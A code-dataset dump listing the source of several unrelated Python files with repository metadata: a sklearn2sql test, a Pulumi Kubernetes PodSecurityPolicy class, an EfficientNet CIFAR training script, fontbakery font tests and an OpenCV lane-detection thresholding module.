hexsha
stringlengths 40
40
| size
int64 3
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
972
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
972
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
972
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.03M
| avg_line_length
float64 1.13
941k
| max_line_length
int64 2
941k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
791c916480d1f29765cfd016642d4bb0b4d0aa31
| 141 |
py
|
Python
|
tests/regression/diabetes/ws_diabetes_GradientBoostingRegressor_oracle_code_gen.py
|
antoinecarme/sklearn2sql_heroku
|
d680db10683daa419324461eeea851dd8b103ad5
|
[
"BSD-3-Clause"
] | 1 |
2019-07-09T14:45:18.000Z
|
2019-07-09T14:45:18.000Z
|
tests/regression/diabetes/ws_diabetes_GradientBoostingRegressor_oracle_code_gen.py
|
antoinecarme/sklearn2sql_heroku
|
d680db10683daa419324461eeea851dd8b103ad5
|
[
"BSD-3-Clause"
] | 5 |
2017-11-13T13:35:37.000Z
|
2021-11-11T12:57:20.000Z
|
tests/regression/diabetes/ws_diabetes_GradientBoostingRegressor_oracle_code_gen.py
|
antoinecarme/sklearn2sql_heroku
|
d680db10683daa419324461eeea851dd8b103ad5
|
[
"BSD-3-Clause"
] | 1 |
2021-09-19T15:05:33.000Z
|
2021-09-19T15:05:33.000Z
|
from sklearn2sql_heroku.tests.regression import generic as reg_gen
reg_gen.test_model("GradientBoostingRegressor" , "diabetes" , "oracle")
| 28.2 | 71 | 0.815603 |
cba57a828491a4f7d1f33c9519906af64d07ee84
| 4,546 |
py
|
Python
|
sdk/python/pulumi_kubernetes/policy/v1beta1/PodSecurityPolicy.py
|
vijayraavi/pulumi-kubernetes
|
0a18b87fd1b4fa5778542dbb0e82a08a2e91ab88
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/policy/v1beta1/PodSecurityPolicy.py
|
vijayraavi/pulumi-kubernetes
|
0a18b87fd1b4fa5778542dbb0e82a08a2e91ab88
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_kubernetes/policy/v1beta1/PodSecurityPolicy.py
|
vijayraavi/pulumi-kubernetes
|
0a18b87fd1b4fa5778542dbb0e82a08a2e91ab88
|
[
"Apache-2.0"
] | null | null | null |
# *** WARNING: this file was generated by the Pulumi Kubernetes codegen tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
from typing import Optional
import pulumi
import pulumi.runtime
from pulumi import Input, ResourceOptions
from ... import tables, version
class PodSecurityPolicy(pulumi.CustomResource):
"""
PodSecurityPolicy governs the ability to make requests that affect the Security Context that
will be applied to a pod and container.
"""
apiVersion: pulumi.Output[str]
"""
APIVersion defines the versioned schema of this representation of an object. Servers should
convert recognized schemas to the latest internal value, and may reject unrecognized values.
More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
"""
kind: pulumi.Output[str]
"""
Kind is a string value representing the REST resource this object represents. Servers may infer
this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More
info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
"""
metadata: pulumi.Output[dict]
"""
Standard object's metadata. More info:
https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
"""
spec: pulumi.Output[dict]
"""
spec defines the policy enforced.
"""
def __init__(self, resource_name, opts=None, metadata=None, spec=None, __name__=None, __opts__=None):
"""
Create a PodSecurityPolicy resource with the given unique name, arguments, and options.
:param str resource_name: The _unique_ name of the resource.
:param pulumi.ResourceOptions opts: A bag of options that control this resource's behavior.
:param pulumi.Input[dict] metadata: Standard object's metadata. More info:
https://git.k8s.io/community/contributors/devel/sig-architecture/api-conventions.md#metadata
:param pulumi.Input[dict] spec: spec defines the policy enforced.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if not resource_name:
raise TypeError('Missing resource name argument (for URN creation)')
if not isinstance(resource_name, str):
raise TypeError('Expected resource name to be a string')
if opts and not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
__props__ = dict()
__props__['apiVersion'] = 'policy/v1beta1'
__props__['kind'] = 'PodSecurityPolicy'
__props__['metadata'] = metadata
__props__['spec'] = spec
__props__['status'] = None
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(
version=version.get_version(),
))
super(PodSecurityPolicy, self).__init__(
"kubernetes:policy/v1beta1:PodSecurityPolicy",
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None):
"""
Get the state of an existing `PodSecurityPolicy` resource, as identified by `id`.
The ID is of the form `[namespace]/[name]`; if `[namespace]` is omitted,
then (per Kubernetes convention) the ID becomes `default/[name]`.
Pulumi will keep track of this resource using `resource_name` as the Pulumi ID.
:param str resource_name: _Unique_ name used to register this resource with Pulumi.
:param pulumi.Input[str] id: An ID for the Kubernetes resource to retrieve.
Takes the form `[namespace]/[name]` or `[name]`.
:param Optional[pulumi.ResourceOptions] opts: A bag of options that control this
resource's behavior.
"""
opts = ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
return PodSecurityPolicy(resource_name, opts)
def translate_output_property(self, prop: str) -> str:
return tables._CASING_FORWARD_TABLE.get(prop) or prop
def translate_input_property(self, prop: str) -> str:
return tables._CASING_BACKWARD_TABLE.get(prop) or prop
| 41.327273 | 107 | 0.683018 |
e95a382de6039ff66f7a286f90e8b497cd63a933
| 18,288 |
py
|
Python
|
examples/cifar/main.py
|
Lornatang/EfficientNet
|
1b8718735888aa21fbef78b825af1dacd3c257a2
|
[
"Apache-2.0"
] | 4 |
2020-01-12T01:02:04.000Z
|
2020-04-10T00:32:05.000Z
|
examples/cifar/main.py
|
Lornatang/EfficientNet
|
1b8718735888aa21fbef78b825af1dacd3c257a2
|
[
"Apache-2.0"
] | null | null | null |
examples/cifar/main.py
|
Lornatang/EfficientNet
|
1b8718735888aa21fbef78b825af1dacd3c257a2
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Lorna Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Evaluate on CIFAR. Note that at the moment, training is not implemented (I am working on it).
that being said, evaluation is working.
"""
import argparse
import os
import random
import shutil
import time
import warnings
import PIL
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.distributed as dist
import torch.optim
import torch.multiprocessing as mp
import torch.utils.data
import torch.utils.data.distributed
import torchvision.transforms as transforms
import torchvision.datasets as datasets
import torchvision.models as models
from efficientnet import EfficientNet
from apex import amp
parser = argparse.ArgumentParser(description='PyTorch CIFAR Training')
parser.add_argument('data', metavar='DIR', default='data',
help='path to dataset')
parser.add_argument('-a', '--arch', metavar='ARCH', default='resnet18',
help='model architecture (default: resnet18)')
parser.add_argument('-j', '--workers', default=1, type=int, metavar='N',
help='number of data loading workers (default: 1)')
parser.add_argument('--epochs', default=90, type=int, metavar='N',
help='number of total epochs to run')
parser.add_argument('--start-epoch', default=0, type=int, metavar='N',
help='manual epoch number (useful on restarts)')
parser.add_argument('-b', '--batch-size', default=256, type=int,
metavar='N',
help='mini-batch size (default: 256), this is the total '
'batch size of all GPUs on the current node when '
'using Data Parallel or Distributed Data Parallel')
parser.add_argument('--lr', '--learning-rate', default=0.1, type=float,
metavar='LR', help='initial learning rate', dest='lr')
parser.add_argument('--momentum', default=0.9, type=float, metavar='M',
help='momentum')
parser.add_argument('--wd', '--weight-decay', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)',
dest='weight_decay')
parser.add_argument('-p', '--print-freq', default=10, type=int,
metavar='N', help='print frequency (default: 10)')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--opt_level', default="O1", type=str,
help="Choose which accuracy to train. (default: 'O1')")
parser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',
help='evaluate model on validation set')
parser.add_argument('--pretrained', dest='pretrained', action='store_true',
help='use pre-trained model')
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
help='GPU id to use.')
parser.add_argument('--image_size', default=32, type=int,
help='image size')
parser.add_argument('--advprop', default=False, action='store_true',
help='use advprop or not')
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
if args.seed is not None:
random.seed(args.seed)
torch.manual_seed(args.seed)
cudnn.deterministic = True
warnings.warn('You have chosen to seed training. '
'This will turn on the CUDNN deterministic setting, '
'which can slow down your training considerably! '
'You may see unexpected behavior when restarting '
'from checkpoints.')
if args.gpu is not None:
warnings.warn('You have chosen a specific GPU. This will completely '
'disable data parallelism.')
if args.dist_url == "env://" and args.world_size == -1:
args.world_size = int(os.environ["WORLD_SIZE"])
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(args.gpu, ngpus_per_node, args)
def main_worker(gpu, ngpus_per_node, args):
global best_acc1
args.gpu = gpu
if args.gpu is not None:
print("Use GPU: {} for training".format(args.gpu))
if args.distributed:
if args.dist_url == "env://" and args.rank == -1:
args.rank = int(os.environ["RANK"])
if args.multiprocessing_distributed:
# For multiprocessing distributed training, rank needs to be the
# global rank among all the processes
args.rank = args.rank * ngpus_per_node + gpu
dist.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
# create model
if 'efficientnet' in args.arch: # NEW
if args.pretrained:
model = EfficientNet.from_pretrained(args.arch, advprop=args.advprop, num_classes=args.num_classes)
print("=> using pre-trained model '{}'".format(args.arch))
else:
print("=> creating model '{}'".format(args.arch))
model = EfficientNet.from_name(args.arch)
else:
if args.pretrained:
print("=> using pre-trained model '{}'".format(args.arch))
model = models.__dict__[args.arch](pretrained=True)
else:
print("=> creating model '{}'".format(args.arch))
model = models.__dict__[args.arch]()
if args.distributed:
# For multiprocessing distributed, DistributedDataParallel constructor
# should always set the single device scope, otherwise,
# DistributedDataParallel will use all available devices.
if args.gpu is not None:
torch.cuda.set_device(args.gpu)
model.cuda(args.gpu)
# When using a single GPU per process and per
# DistributedDataParallel, we need to divide the batch size
# ourselves based on the total number of GPUs we have
args.batch_size = int(args.batch_size / ngpus_per_node)
args.workers = int(args.workers / ngpus_per_node)
model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[args.gpu])
else:
model.cuda()
# DistributedDataParallel will divide and allocate batch_size to all
# available GPUs if device_ids are not set
model = torch.nn.parallel.DistributedDataParallel(model)
elif args.gpu is not None:
torch.cuda.set_device(args.gpu)
model = model.cuda(args.gpu)
else:
# DataParallel will divide and allocate batch_size to all available GPUs
if args.arch.startswith('alexnet') or args.arch.startswith('vgg'):
model.features = torch.nn.DataParallel(model.features)
model.cuda()
else:
model = torch.nn.DataParallel(model).cuda()
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda(args.gpu)
optimizer = torch.optim.SGD(model.parameters(), args.lr,
momentum=args.momentum,
weight_decay=args.weight_decay)
model, optimizer = amp.initialize(model, optimizer, opt_level=args.opt_level)
# optionally resume from a checkpoint
if args.resume:
if os.path.isfile(args.resume):
print(f"=> loading checkpoint '{args.resume}'")
checkpoint = torch.load(args.resume)
args.start_epoch = checkpoint['epoch']
best_acc1 = checkpoint['best_acc1']
if args.gpu is not None:
# best_acc1 may be from a checkpoint from a different GPU
best_acc1 = best_acc1.to(args.gpu)
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
print(f"=> loaded checkpoint '{args.resume}' (epoch {checkpoint['epoch']})")
else:
print(f"=> no checkpoint found at '{args.resume}'")
cudnn.benchmark = True
# Data loading code
traindir = os.path.join(args.data, 'train')
valdir = os.path.join(args.data, 'val')
if args.advprop:
normalize = transforms.Lambda(lambda img: img * 2.0 - 1.0)
else:
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
train_dataset = datasets.ImageFolder(
traindir,
transforms.Compose([
transforms.RandomResizedCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
]))
if args.distributed:
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset)
else:
train_sampler = None
train_loader = torch.utils.data.DataLoader(
train_dataset, batch_size=args.batch_size, shuffle=(train_sampler is None),
num_workers=args.workers, pin_memory=True, sampler=train_sampler)
if 'efficientnet' in args.arch:
image_size = 32
val_transforms = transforms.Compose([
transforms.Resize(image_size, interpolation=PIL.Image.BICUBIC),
transforms.CenterCrop(image_size),
transforms.ToTensor(),
normalize,
])
print('Using image size', image_size)
else:
val_transforms = transforms.Compose([
transforms.Resize(36),
transforms.CenterCrop(32),
transforms.ToTensor(),
normalize,
])
print('Using image size', 32)
val_loader = torch.utils.data.DataLoader(
datasets.ImageFolder(valdir, val_transforms),
batch_size=args.batch_size, shuffle=False,
num_workers=args.workers, pin_memory=True)
if args.evaluate:
res = validate(val_loader, model, criterion, args)
with open('res.txt', 'w') as f:
print(res, file=f)
return
for epoch in range(args.start_epoch, args.epochs):
if args.distributed:
train_sampler.set_epoch(epoch)
adjust_learning_rate(optimizer, epoch, args)
# train for one epoch
train(train_loader, model, criterion, optimizer, epoch, args)
# evaluate on validation set
acc1 = validate(val_loader, model, criterion, args)
# remember best acc@1 and save checkpoint
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
if not args.multiprocessing_distributed or (args.multiprocessing_distributed
and args.rank % ngpus_per_node == 0):
save_checkpoint({
'epoch': epoch + 1,
'arch': args.arch,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer': optimizer.state_dict(),
}, is_best)
def train(train_loader, model, criterion, optimizer, epoch, args):
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(train_loader), batch_time, data_time, losses, top1,
top5, prefix="Epoch: [{}]".format(epoch))
# switch to train mode
model.train()
end = time.time()
for i, (images, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
def validate(val_loader, model, criterion, args):
batch_time = AverageMeter('Time', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(len(val_loader), batch_time, losses, top1, top5,
prefix='Test: ')
# switch to evaluate mode
model.eval()
with torch.no_grad():
end = time.time()
for i, (images, target) in enumerate(val_loader):
if args.gpu is not None:
images = images.cuda(args.gpu, non_blocking=True)
target = target.cuda(args.gpu, non_blocking=True)
# compute output
output = model(images)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output, target, topk=(1, 5))
losses.update(loss.item(), images.size(0))
top1.update(acc1[0], images.size(0))
top5.update(acc5[0], images.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % args.print_freq == 0:
progress.print(i)
# TODO: this should also be done with the ProgressMeter
print(' * Acc@1 {top1.avg:.3f} Acc@5 {top5.avg:.3f}'
.format(top1=top1, top5=top5))
return top1.avg
def save_checkpoint(state, is_best, filename="checkpoint.pth"):
torch.save(state, filename)
if is_best:
shutil.copyfile(filename, "model_best.pth")
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, *meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def print(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
if __name__ == '__main__':
main()
| 38.910638 | 111 | 0.611877 |
f14cecca50c37646ab2f9ff0ec514500a8fad959
| 2,286 |
py
|
Python
|
tests/specifications/post_test.py
|
m4rc1e/fontbakery
|
da4c4b69abdd41314f9bdb58d9e47722e0680816
|
[
"Apache-2.0"
] | null | null | null |
tests/specifications/post_test.py
|
m4rc1e/fontbakery
|
da4c4b69abdd41314f9bdb58d9e47722e0680816
|
[
"Apache-2.0"
] | null | null | null |
tests/specifications/post_test.py
|
m4rc1e/fontbakery
|
da4c4b69abdd41314f9bdb58d9e47722e0680816
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from fontbakery.checkrunner import (
DEBUG
, INFO
, WARN
, ERROR
, SKIP
, PASS
, FAIL
)
check_statuses = (ERROR, FAIL, SKIP, PASS, WARN, INFO, DEBUG)
from fontTools.ttLib import TTFont
mada_fonts = [
"data/test/mada/Mada-Black.ttf",
"data/test/mada/Mada-ExtraLight.ttf",
"data/test/mada/Mada-Medium.ttf",
"data/test/mada/Mada-SemiBold.ttf",
"data/test/mada/Mada-Bold.ttf",
"data/test/mada/Mada-Light.ttf",
"data/test/mada/Mada-Regular.ttf",
]
@pytest.fixture
def mada_ttFonts():
return [TTFont(path) for path in mada_fonts]
def test_check_008(mada_ttFonts):
""" Fonts have consistent underline thickness ? """
from fontbakery.specifications.post import com_google_fonts_check_008 as check
# We start with our reference Mada font family,
# which we know has the same value of post.underlineThickness
# accross all of its font files, based on our inspection
# of the file contents using TTX.
#
# So the check should PASS in this case:
print('Test PASS with a good family.')
status, message = list(check(mada_ttFonts))[-1]
assert status == PASS
# Then we introduce the issue by setting a
# different underlineThickness value in just
# one of the font files:
value = mada_ttFonts[0]['post'].underlineThickness
incorrect_value = value + 1
mada_ttFonts[0]['post'].underlineThickness = incorrect_value
# And now re-running the check on the modified
# family should result in a FAIL:
print('Test FAIL with an inconsistent family.')
status, message = list(check(mada_ttFonts))[-1]
assert status == FAIL
def test_check_015():
""" Font has post table version 2 ? """
from fontbakery.specifications.post import com_google_fonts_check_015 as check
print('Test PASS with good font.')
# our reference Mada family is know to be good here.
ttFont = TTFont("data/test/mada/Mada-Regular.ttf")
status, message = list(check(ttFont, 'glyf' in ttFont))[-1]
assert status == PASS
# modify the post table version
ttFont['post'].formatType = 3
print('Test FAIL with fonts that diverge on the fontRevision field value.')
status, message = list(check(ttFont, 'glyf' in ttFont))[-1]
assert status == FAIL
| 30.48 | 80 | 0.692476 |
b360ec5333b437a2c22eff10f181ee34e18c9c64
| 7,021 |
py
|
Python
|
libs/dir_sobel_color_persp_warp_func.py
|
kavach-feature/Advanced_lane_finding
|
12e4e330e338734fdb35655c7581b98ba1eb490b
|
[
"MIT"
] | null | null | null |
libs/dir_sobel_color_persp_warp_func.py
|
kavach-feature/Advanced_lane_finding
|
12e4e330e338734fdb35655c7581b98ba1eb490b
|
[
"MIT"
] | null | null | null |
libs/dir_sobel_color_persp_warp_func.py
|
kavach-feature/Advanced_lane_finding
|
12e4e330e338734fdb35655c7581b98ba1eb490b
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
import glob
objpoints=[]
imgpoints=[]
objp=np.zeros((6*9,3), np.float32)
objp[:,:2]= np.mgrid[0:9,0:6].T.reshape(-1,2)
# Defines a function that applies Sobel x and y,
# then computes the direction of the gradient
# and applies a threshold.
def abs_sobel_thresh(img, orient='x', sobel_kernel = 3, thresh=(0,255)):
# Grayscale
gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# Apply cv2.Sobel()
if orient == 'x':
sobel_orient= cv2.Sobel(gray,cv2.CV_64F,1,0)
elif orient == 'y':
sobel_orient= cv2.Sobel(gray,cv2.CV_64F,0,1)
# Take the absolute value of the output from cv2.Sobel()
abs_sobel = np.absolute(sobel_orient)
# Scale the result to an 8-bit range (0-255)
scaled_sobel= np.uint8(255*abs_sobel/np.max(abs_sobel))
binary_output= np.zeros_like(scaled_sobel)
# Apply lower and upper thresholds
binary_output [(scaled_sobel >=thresh[0])&(scaled_sobel<=thresh[1])]=1
# Create binary_output
return binary_output
def mag_thresh(img, sobel_kernel=3, mag_thresh=(0, 255)):
# Grayscale
# Apply the following steps to img
# 1) Convert to grayscale
gray=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# 2) Take the gradient in x and y separately
sobel_orient_x = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobel_orient_y = cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
# 3) Calculate the magnitude
abs_sobel= np.sqrt(sobel_orient_x**2 + sobel_orient_y**2)
# 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8
scaled_sobel=np.uint8(255*abs_sobel/np.max(abs_sobel))
# 5) Create a binary mask where mag thresholds are met
binary_output=np.zeros_like(scaled_sobel)
binary_output[(scaled_sobel>=mag_thresh[0]) & (scaled_sobel<=mag_thresh[1])]=1
# 6) Return this mask as your binary_output image
#binary_output = np.copy(img) # Remove this line
return binary_output
def dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):
# Apply the following steps to img
# 1) Convert to grayscale
gray=cv2.cvtColor(img,cv2.COLOR_RGB2GRAY)
# 2) Take the gradient in x and y separately
sobel_orient_x = cv2.Sobel(gray,cv2.CV_64F,1,0,ksize=sobel_kernel)
sobel_orient_y= cv2.Sobel(gray,cv2.CV_64F,0,1,ksize=sobel_kernel)
# 3) Take the absolute value of the x and y gradients
abs_sobelx=np.absolute(sobel_orient_x)
abs_sobely=np.absolute(sobel_orient_y)
# 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient
dir_gradient = np.arctan2(abs_sobely,abs_sobelx)
# 5) Create a binary mask where direction thresholds are met
binary_output= np.zeros_like(dir_gradient)
binary_output[(dir_gradient>= thresh[0])& (dir_gradient<= thresh[1])]=1
# 6) Return this mask as your binary_output image
#binary_output = np.copy(img) # Remove this line
return binary_output
def hls_select(img, thresh=(0, 255)):
# 1) Convert to HLS color space
hls_image= cv2.cvtColor(img,cv2.COLOR_RGB2HLS)
S=hls_image[:,:,2]
# 2) Apply a threshold to the S channel
threshold=(190,255)
# 3) Return a binary image of threshold result
#binary_output = np.copy(img) # placeholder line
binary_output= np.zeros_like(S)
binary_output[(S>=threshold[0])&(S<=threshold[1])]=1
return binary_output
def birds_eye_view(image):
img_size= (image.shape[1],image.shape[0])
src = np.float32(
[[490,480],
[810,480],
[1250,720],
[140,720]])
dst = np.float32(
[[0,0],
[1280,0],
[1250,720],
[140,720]])
M = cv2.getPerspectiveTransform(src,dst)
Minv = cv2.getPerspectiveTransform(dst, src)
warped_image = cv2.warpPerspective(image,M, img_size,flags=cv2.INTER_NEAREST)
return warped_image, Minv
def create_threshold_binary_image(image,ksize=3):
ksize=3
gradx=abs_sobel_thresh(image,orient='x',sobel_kernel=ksize,thresh=(20,100))
grady=abs_sobel_thresh(image,orient='y',sobel_kernel=ksize,thresh=(20,100))
#Applying magnitude threshold
mag_binary = mag_thresh(image,sobel_kernel=ksize,mag_thresh=(30,100))
#Applying threshold where the vertical direction of the gradient is met
dir_output= dir_threshold(image,sobel_kernel=ksize,thresh=(0.7,1.3))
#Applying HLS color space threshold
hls_output = hls_select(image)
"""Creating a binary image where only non-zero pixels meeting absolute Sobelx threshold,
magnitude based threshold (for Sobelx and Sobel y) and direction gradient meets the criteria"""
combined = np.zeros_like(dir_output)
combined [(gradx==1)&(grady ==1)| (mag_binary ==1)& (dir_output ==1)] =1
combined_with_color_threshold=np.zeros_like(combined)
combined_with_color_threshold [(hls_output==1)|(combined==1)]=1
#combined_with_color_threshold [(combined==1)]=1
return combined_with_color_threshold
def render_original_combined_transforms_image(image1, image2,image2_title ="Processed Image"):
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(17, 9))
f.tight_layout()
ax1.imshow(image1,cmap='gray')
ax1.set_title("Original Image", fontsize=10)
ax2.imshow(image2,cmap='gray')
ax2.set_title(image2_title, fontsize=10)
plt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.5)
plt.show()
def render_original_plotted_warped_image(image1, image2,image2_title ="Processed Image"):
f, (ax1, ax2) = plt.subplots(1, 2, figsize=(17, 9))
f.tight_layout()
ax1.imshow(image1,cmap='gray')
"""ax1.plot([695,1100],[450,700], color='r', linewidth="6")
ax1.plot([1100,225],[700,700], color='r', linewidth="6")
ax1.plot([225,600],[700,470], color='r', linewidth="6")
ax1.plot([600,695],[470,450], color='r', linewidth="6")"""
ax1.set_title("Original Image", fontsize=10)
ax2.imshow(image2,cmap='gray')
"""ax2.plot([900,900],[0,700], color='r', linewidth="6")
ax2.plot([900,255],[700,700], color='r', linewidth="6")
ax2.plot([255,255],[700,0], color='r', linewidth="6")
ax2.plot([255,900],[0,0], color='r', linewidth="6")"""
ax2.set_title(image2_title, fontsize=10)
plt.subplots_adjust(left=0.05, right=0.95, top=0.95, bottom=0.5)
plt.show()
image_path = './test_images/straight_lines1.jpg'
image = mpimg.imread(image_path)
combined_image= create_threshold_binary_image(image,3)
render_original_combined_transforms_image(image,combined_image,"Thresholded Binary Image")
"""
image_path = './test_images/test6.jpg'
image = mpimg.imread(image_path)
combined_image= create_threshold_binary_image(image,3)
warped_image= birds_eye_view(combined_image)
render_original_plotted_warped_image(combined_image,warped_image,"Birds Eye view Image")"""
| 39.44382 | 100 | 0.683094 |
d7e137f11b2e3a56ffbc1e7e0a579c3543ded5a5
| 1,292 |
py
|
Python
|
projetinhos/ex115/interface/__init__.py
|
dani-fn/Projetinhos_Python
|
692ff0a7f57d8f8f2e28f7b2c38bb6401e013bdb
|
[
"MIT"
] | null | null | null |
projetinhos/ex115/interface/__init__.py
|
dani-fn/Projetinhos_Python
|
692ff0a7f57d8f8f2e28f7b2c38bb6401e013bdb
|
[
"MIT"
] | null | null | null |
projetinhos/ex115/interface/__init__.py
|
